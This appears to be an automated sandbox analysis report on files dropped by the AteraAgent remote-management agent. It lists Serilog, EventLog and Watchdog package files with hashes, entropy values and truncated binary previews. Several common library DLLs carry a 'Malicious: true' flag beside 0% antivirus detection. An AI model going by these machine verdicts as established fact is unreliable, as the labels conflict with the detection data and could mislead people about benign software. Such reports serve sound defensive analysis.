                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..f..........Z.... ........... ...................................`.....................................O....................p..P(.............T............................................ ............... ..H............text...`e... ...f.................. ..`.rsrc................h..............@..@.reloc...............n..............@..B................;.......H.......tF...=..................t.......................................2.o....s9...*6..s4...o....*..0..>.......sg......}......}......}.....-.r...ps....z....h...s....o....&.*...0..C.......sk......}.....-.r...ps....z.{....-.r...ps....z....l...s......(....*..0..{.......sm......}......}!.....}"....-.r...ps....z.{!...-.r...ps....z.(....u....} .....{ ...,..{"......+..}........n...s....o....&.*..0..U.......st......}(....-.r1..ps....z....u...s....(...+&.~....%-.&~......f...s....%...

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Serilog.Extensions.Logging.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):27728
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.55235877778647
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:YSgpZUlMxR5I1z8w3Uta2lQBVMxzMJktYm+9HWXCYhNyb8E9VF6IYijSJIVxKtKH:YSCZUl2O1zCnXyzDeEpYi60ki
                                                                                                                                                                                                                                                                                              MD5:66ECB4DF9FFFE28A3AD4CF7D94F26981
                                                                                                                                                                                                                                                                                              SHA1:A10762FADF1AF95C6C685FBE130D9206F3F0B2A5
                                                                                                                                                                                                                                                                                              SHA-256:B650B86C30FF78A47698DF672994AF7B0D247D558CA5A39FC81AC809C5E97215
                                                                                                                                                                                                                                                                                              SHA-512:AAC4457E5FB735308DDC036E3CB7BD73E1151E6B8FB70919477ACBA9FF4A5F646C45F462091461A33409C20510C89E0CCFA046A4082A222F8985274F952D1F35
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....m..........." ..0..:..........vX... ...`....... ....................................`................................."X..O....`..h............D..P(...........W..T............................................ ............... ..H............text...|8... ...:.................. ..`.rsrc...h....`.......<..............@..@.reloc...............B..............@..B................VX......H.......H...H(...................V........................................(....*..(....*..-.r...ps....z.-.r...ps....z..s......o....*v.-.r1..ps....z...s....o.....*...0..V.......s.......}.....-.rA..ps....z.,..o......./...s....(...+&+...{.....s....(....&...(...+&.*...0...........-.rQ..ps....z.o.... ....1..{.....o....*.{.....o....t......,..*.{.....o......{..........(.....{....o.... ....3..{....o ....{......o!......,..(".....*.........U.4.........s#...}.....s$...}.....s%...}.....(

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Serilog.Sinks.File.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):41552
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.319744600570524
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:+bUqoXsEgfFHoiikZ9y3BHdD+XR/tGo06BCEpYi60U:LLrgfPw3mXREaD76d
                                                                                                                                                                                                                                                                                              MD5:DD5803D458FAB3FAA46BACBD49188A64
                                                                                                                                                                                                                                                                                              SHA1:C16F2ECDED642B9A47A973558EA9A5C5612CC6D0
                                                                                                                                                                                                                                                                                              SHA-256:A56FEB730AF4C3D615855BC12CFBE08F473CC147EC9F878D5F4EE21FC81A9CC2
                                                                                                                                                                                                                                                                                              SHA-512:3B28818A52242977094536F27EB1E75D5ED8AD3A364CB613199F2D4D7D794E2B208B3470563BE0432E8F30FF13B72416A4EB32F0FA9D96C64BD5857A2F596E02
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....z..........." ..0..p............... ........... ...............................<....`....................................O....................z..P(.............T............................................ ............... ..H............text...$n... ...p.................. ..`.rsrc................r..............@..@.reloc...............x..............@..B........................H........<...O..................X.........................................(....*^.(.......D...%...}....*:.(......}....*:.(......}....*...0..,.............................................(....*.0..*...........................................(....*...0..(.........................................(....*.0..&.......................................(....*...0..S........-.r...ps....z.-.r%..ps....z.-.r/..ps....z...s ..............................(....*..0..V........-.r...ps....z.-.rM.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Serilog.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):138320
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.1600142991276
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:IobKO7RaoWuUeZk/f0Sh1HlWZm1ZZTdyGFkNUMT+P65jDt4Ni:VbKKz1UeZk/Phv8lDuPad
                                                                                                                                                                                                                                                                                              MD5:E383F6A50EB79DD0F34AA7F56CDC0C6F
                                                                                                                                                                                                                                                                                              SHA1:9355A89B24EA73429664C4B29B24C8DEDE63882F
                                                                                                                                                                                                                                                                                              SHA-256:95A1242A546713B4558DA3695B16F1A219FB1F0D5DE0F8576AA95FE475385C41
                                                                                                                                                                                                                                                                                              SHA-512:785955AE8363591057FC90491631DB316C91F2827292C84F51EEF09E1D25E7D83F2A77D3721DA27E8B1ACD1C7FFE00E83998F87ADABEE97DFC7CF82DFE5E0041
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....\..........." ..0.............6.... ... ....... .......................`.......f....`.....................................O.... ..................P(...@..........T............................................ ............... ..H............text...<.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......h...0O............................................................{)...*..{*...*V.(+.....}).....}*...*...0..;........u......,/(,....{)....{)...o-...,.(.....{*....{*...o/...*.*. ... )UU.Z(,....{)...o0...X )UU.Z(.....{*...o1...X*.0..b........r...p......%..{)......%q.........-.&.+.......o2....%..{*......%q.........-.&.+.......o2....(3...*..{4...*..{5...*V.(+.....}4.....}5...*.0..;........u......,/(,....{4....{4...o-...,.(.....{5....{5...o/...*.*. .T.2 )UU.Z(,....{4...o0

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\System.Diagnostics.EventLog.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):52304
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.147960758267006
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:Ib1yYPvLtCJY0E+F3xeHwNaleirtqCVlXmL+7NQ1OaY7c0EpYi60OD6u:Ib1yYPL0E+F+8inVlXNP7cN76LWu
                                                                                                                                                                                                                                                                                              MD5:2B1314FCC0FD24FF3BBAF5CE9F477E4E
                                                                                                                                                                                                                                                                                              SHA1:F3E8311CE660FC8BDAABEA6CBDA8073138A0950C
                                                                                                                                                                                                                                                                                              SHA-256:CE284908174703B19C8F81B471C26BE0164DCA0B282A55E8D914082E99CF2D90
                                                                                                                                                                                                                                                                                              SHA-512:3D37EBECECDEAD674261F0A96FA5DC42A77F0D1C5BC60CE50273A401510D27F5B667AF68483642F784E371456A21BEF8D379FEE95EFC7D56ED3DCF9AF608BD0D
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....D............" ..0.............n.... ........... ....................................`.....................................O.......................P(..........,...T............................................ ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................O.......H........4...h...........................................................~....*..0..........(....,..*..(.....o'......&...*...................0...........(.......((...-..,..*.*.(....,.r...p......%...%...()...*..(*...*.(....,.r...p......%...%...%...()...*...(+...*.(....,!r...p......%...%...%...%...()...*....(,...*..,&(....,..r...pr...p.()...(-...*..(....*.*.(....,.r...p......%...%...()...*...(/...*.(....,.r...p......%...%...%...()...*....(0...*.(....,"r...p......%...%...%...%..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\runtimes\win\lib\net6.0\System.Diagnostics.EventLog.Messages.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):799856
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.7597847647294211
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:g/r3V645uWOL8/pCuPHnhWgN7acW5RjroUEKup3JdqnajvsKyhr:gx6Yi/uPHRN7y/oU7aJdlrsKK
                                                                                                                                                                                                                                                                                              MD5:6A205C78D14FA91EFCA3AE531D1FF7E8
                                                                                                                                                                                                                                                                                              SHA1:9E26E81DFDBA74AE261912993DE875D13BB0891C
                                                                                                                                                                                                                                                                                              SHA-256:6444DFA03609248EFFD398E8562AF484AD0163A6C47CEE6D3A287FFDEF809AD2
                                                                                                                                                                                                                                                                                              SHA-512:FD797F528519BD9B864394C2A45AFA5C7F94F58D1F2B55E0017987FB521C9F7292DBE1366BE778E60352FA8F9A08C10B7299AEA39DEEEE3A164BB105857FE7ED
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...1.$..........." ..0..............(... ...@....... ..............................Ap....`.................................q(..O....@..l...............p$...`......h'..T............................................ ............... ..H............text........ ...................... ..`.rsrc...l....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~......,...#Strings............#US.........#GUID...,...l...#Blob......................3..................................z...............\.....0...........-.................C.................[.....x...........D...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.,...3.H...3.^...3.t...;.....

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\runtimes\win\lib\net6.0\System.Diagnostics.EventLog.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):132200
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.172481694612173
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:/Nw50BNfe5FxLyWnongSwUp+k7bAMZ7cPd:CKNfQxRncgS7bBZ7y
                                                                                                                                                                                                                                                                                              MD5:2D13C1C8539D6FD7A0717941BF0357AF
                                                                                                                                                                                                                                                                                              SHA1:0E70EA88A866BAF660950FE74482149456557BDC
                                                                                                                                                                                                                                                                                              SHA-256:644BB3A1AFBEA6B835422B0987376F04796E38BBBECC08C94023638EEBE57F4C
                                                                                                                                                                                                                                                                                              SHA-512:A52AE3560B22C354F5CE89358219A7FA2FEAA12B376F72B8B53E6ED5E4B02703777CF1678744E7C038C29616975C0E63DFE17BFCB0A9D53B394452EC17AD979F
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...C.D..........." ..0.............&.... ........... .......................@.......(....`.....................................O.......................h$... ..........T............................................ ............... ..H............text...<.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H.......................D.......\......................................."..(,...*2.{-...(....*"..(,...*2.{-...(....*"..(,...*2.{-...(....*.~+...*....0..........(+...,..*..(6....o.......&...*.............."....0...........(,......(/...-..,..*.*.(+...,.r...p......%...%...(0...*..(1...*.(+...,.r...p......%...%...%...(0...*...(2...*.(+...,!r...p......%...%...%...%...(0...*....(3...*..,&(+...,..r...pr...p.(0...(4...*..(5...*.*.(+...,.r...p......%...%...(0...*...(6...*.(+...,.r...p

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog.zip

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1841171
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.998996410254455
                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                              SSDEEP:49152:Upa8rr5HRG09H3f1XA0C+KqlxzbiflngRscQXyt3lqHkHD:fIrtR3F3FA0C+KqIn68XyNlqEj
                                                                                                                                                                                                                                                                                              MD5:5ED9543E9F5826EAD203316EF0A8863D
                                                                                                                                                                                                                                                                                              SHA1:8235C0E7568EC42D6851C198ADC76F006883EB4B
                                                                                                                                                                                                                                                                                              SHA-256:33583A8E2DCF039382E80BFA855944407BCBA71976EC41C52810CB8358F42043
                                                                                                                                                                                                                                                                                              SHA-512:5B4318DDC6953F31531EE8163463259DA5546F1018C0FE671280337751F1C57398A5FD28583AFBA85E93D70167494B8997C23FEE121E67BF2F6FB4CA076E9D9F
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:PK........&n.Y................Agent.Package.Watchdog/PK.........n.Yv...d......7...Agent.Package.Watchdog/Agent.Package.Watchdog.deps.jsonaz.....IU`.....g].a...A.....4......A..=mb....5..._....#kBG.}....}.44.P^4..I......Y..4.....)Y8u...q.......$j.."{..z.,I.{......xI..<.i..?..$.....&@..T..[.s[x,}e.//.m.Tt..{.a[P.....3./R.Q..-.A...n..m{ .....0.M.|...rD..N.qp...~s.A......D....Z...-"B...yIqw.XY..{....a........H..A..+.R=.xYM.H.,......._...W}...'..KtA(.......=n..&....v..O.[e.@...lEc.A.4..o......$.A..l4.]M...x.;..r.B.v....u...e...T...h...[...Wh/yt.)..Ra.!w|~.Y....H....g....pYe.(....s.8W..CD.y}!y.$.o.@........|!gb.[.=.=...t..g....H.\rx..4.\.1..H.@-6....l.q...".0&..h..n....n.2|)..E.>..0.~X..l,O=.......I.x....*.6.aA..L4S.}|.Q`.........X...P........TiD.&B..cA...0..p...k.....iM.H..)_.^..-.f0."..8.2.....)jL...d..w....<".........n.Ei.2.`71g...s..:..a.m.t.z....../~G....vD........6r........8p\../..,p..4...G...K..z)lr.....?.;.|aW.J.@..W.1j..%$......Q..h..%...

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Agent.Package.Watchdog.deps.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):40158
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.003264426241275
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:CY1n6EQFVThifqF5ACfcpVBHy8I3PmHPxEiPk:Co6EQFVThi05ACfIVBU3yEYk
                                                                                                                                                                                                                                                                                              MD5:692C65032C40073249CB0965EDD659C2
                                                                                                                                                                                                                                                                                              SHA1:44AFC130C955CAF911C29892BD537737B663D2A1
                                                                                                                                                                                                                                                                                              SHA-256:36400E026D030C92A3DF8C8DB791A4D1D1823B15C404D7A10EB56792FF9C0DA4
                                                                                                                                                                                                                                                                                              SHA-512:9A5B1D1245CD248DB960BD93B35D4403EFE6AF2F6FAF188D57CA181D20C9E0CB695EEF0275AB840A5B5F632E5724CD8832647054C9F7CF3AA7FC52788107877A
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:{.. "runtimeTarget": {.. "name": ".NETCoreApp,Version=v8.0",.. "signature": "".. },.. "compilationOptions": {},.. "targets": {.. ".NETCoreApp,Version=v8.0": {.. "Agent.Package.Watchdog/2.0": {.. "dependencies": {.. "Atera.Agent.Package.Infrastructure": "1.2.7",.. "Atera.Agent.Package.Tools": "1.0.26",.. "System.ServiceProcess.ServiceController": "8.0.0",.. "TaskScheduler": "2.10.1".. },.. "runtime": {.. "Agent.Package.Watchdog.dll": {}.. }.. },.. "Atera.Agent.Package.Infrastructure/1.2.7": {.. "dependencies": {.. "Microsoft.Extensions.Hosting": "8.0.0",.. "Newtonsoft.Json": "13.0.3",.. "Polly": "8.4.1",.. "Serilog.Extensions.Hosting": "8.0.0",.. "Serilog.Sinks.File": "6.0.0".. },.. "runtime": {.. "lib/net8.0/Atera.Agent.Package.Infrastructure.dll": {.. "assemblyVersion": "1.2.7.0",.. "fileVe

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Agent.Package.Watchdog.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):35408
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.445343698989786
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:4HjRXMp49TtCTj2Smpb375kGb1jfXCHcaaTsHmdVuE8mEm+w/DX3fSdQHFtNyb8k:mjRXEqzbL5vBCH3+Vud4DnXlJEpYi60p
                                                                                                                                                                                                                                                                                              MD5:E5401312C2582DDB397568F5A38EDC7A
                                                                                                                                                                                                                                                                                              SHA1:394F35A672F3AF89E73D0C1E3FF468F901191E47
                                                                                                                                                                                                                                                                                              SHA-256:02866CD2A0131FAEB14807A56D70B1674073B6AF19645587DF805D94F60C6ED7
                                                                                                                                                                                                                                                                                              SHA-512:5E0D72A5AD219535DA646C2E1219F43D7E2A764F6592D849BE69D9B9C2E6EA7C6427647FBEC6BEFF2F3B7E423B3FE4AADB2EF91549AB05E01CDA30CCAED0E59F
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...nv............"...0..X...........v... ........@.. ..............................xt....`.................................lv..O....................b..P(..........Pv............................................... ............... ..H............text....V... ...X.................. ..`.rsrc................Z..............@..@.reloc...............`..............@..B.................v......H........2...C............................................................{....*..{....*..{....*..{....*..{....*..{....*..(......}......}......}.......}.......}.......}....*....0...........u.......;.....9....(.....{.....{....o....,w( ....{.....{....o!...,_("....{.....{....o#...,G($....{.....{....o%...,/(&....{.....{....o'...,.((....{.....{....o)...*.*.*..0.......... ...9 )UU.Z(.....{....o*...X )UU.Z( ....{....o+...X )UU.Z("....{....o,...X )UU.Z($....{....o-...X )UU.Z(&....{..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Agent.Package.Watchdog.exe

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):149072
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.214160487040559
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:BhK4Uay3XrQ8habqgp9pC9Z6p5uf3C6k0xuZ04ntfx9hBui11:BhK4XycqgpfCup5sVxuZ041hAW
                                                                                                                                                                                                                                                                                              MD5:2B9BEB2FDBC41AFC48D68D32EF41DD08
                                                                                                                                                                                                                                                                                              SHA1:4A9EA4CF8E02E34EF2DD0EF849FFC0CD9EA6F91C
                                                                                                                                                                                                                                                                                              SHA-256:977D48979E30A146417937D7E11B26334EDEC2ABDDFAE1369A9C4348E34857B1
                                                                                                                                                                                                                                                                                              SHA-512:3E3C3E39FF2DF0D1ED769E6C5ACBA6F7C5D2737D3C426FB4F0E19F3CF6C604707155917584E454A3F208524ED46766B7A3D2D861FA7419F8258C3B6022238E10
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........FR6.'<e.'<e.'<ev.?d.'<ev.8d.'<ev.9d.'<e._.e.'<e.=d.'<e.'=e|'<e..5d.'<e..>d.'<eRich.'<e........PE..d......g.........."....(.Z..........@..........@.............................p............`..........................................................`.......0..\.......P(...P..(.......T.......................(...`...@............p...............................text...lY.......Z.................. ..`.rdata.......p.......^..............@..@.data...............................@....pdata..\....0......................@..@.reloc..(....P......................@..B.rsrc........`......................@..@................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Agent.Package.Watchdog.ini

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):13
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.7004397181410926
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:WhXLVy:WBLs
                                                                                                                                                                                                                                                                                              MD5:F9769BB20BC8A0F137207AC2FA70E73A
                                                                                                                                                                                                                                                                                              SHA1:13A5ADE4ADC04D610CEFD3BACE0B749E33F6FAEE
                                                                                                                                                                                                                                                                                              SHA-256:F117E5835146FCDF2013C5554138C304B5376A1F3E3F1B6C6D1DB0DCD6C998C4
                                                                                                                                                                                                                                                                                              SHA-512:BE47552F6B063FFF51102EC421B3860773FA9F51800F6C2988C5C67BA56DB8E374C2FB048EF6BB0D988620FDC04A2A6ADFBF2A06465E4D4F34BA623B92E5F01B
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:version=2.0..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Agent.Package.Watchdog.runtimeconfig.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):375
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.718662743683283
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:3Hp/hdNyhA0Hv3Opo/XCkyFNOJeZS1MZeQ6NOCUo+K8E7/OyPfKmn5BNTy:dFGv3OpJ5MeU14hex+K8E7nS2r2
                                                                                                                                                                                                                                                                                              MD5:E8D9109BD15637B1FBF349F9C7FF776F
                                                                                                                                                                                                                                                                                              SHA1:19762DAA20AFC8085BA6417A7215F1FE2D619F60
                                                                                                                                                                                                                                                                                              SHA-256:C4A84CDD787CB31AAA46E8282F7D288F0641FDAA4252AC78979340131C8B9110
                                                                                                                                                                                                                                                                                              SHA-512:5CC792C0CDF32C4C893EEBC6651AABED7428D2F467B58D3B58AD21DFCE9DD4EE0924257B4699297F6D41069F27829CE8B8A711642F3208981761B48382D68B74
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:{.. "runtimeOptions": {.. "tfm": "net8.0",.. "rollForward": "LatestMajor",.. "framework": {.. "name": "Microsoft.NETCore.App",.. "version": "8.0.0".. },.. "configProperties": {.. "System.Reflection.Metadata.MetadataUpdater.IsSupported": false,.. "System.Runtime.Serialization.EnableUnsafeBinaryFormatterSerialization": false.. }.. }..}

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Atera.Agent.Package.Infrastructure.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):53840
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.293090921966287
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:fRPeTQrT7/+DeXAsrdacchYyoF9sXduwzufEpYi6082R:9hBUh+NF9sd6Y76MR
                                                                                                                                                                                                                                                                                              MD5:04EEF96CADF921F00359976AA955D093
                                                                                                                                                                                                                                                                                              SHA1:3DB9D89AB01D6F39427B3EB63BA87E98EAF6B3EE
                                                                                                                                                                                                                                                                                              SHA-256:996B85B40022A64D7B2BBDCEA5D51171EEAE6F8A3936279C2451A65554DCBAE3
                                                                                                                                                                                                                                                                                              SHA-512:5F8A8814A5854BE34309BC5D9F3C528EA3A426ABC16BD23226051200E38746B8497E97E32580ACBBEC369635885295FF7375998C10C68690D34669E823836311
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
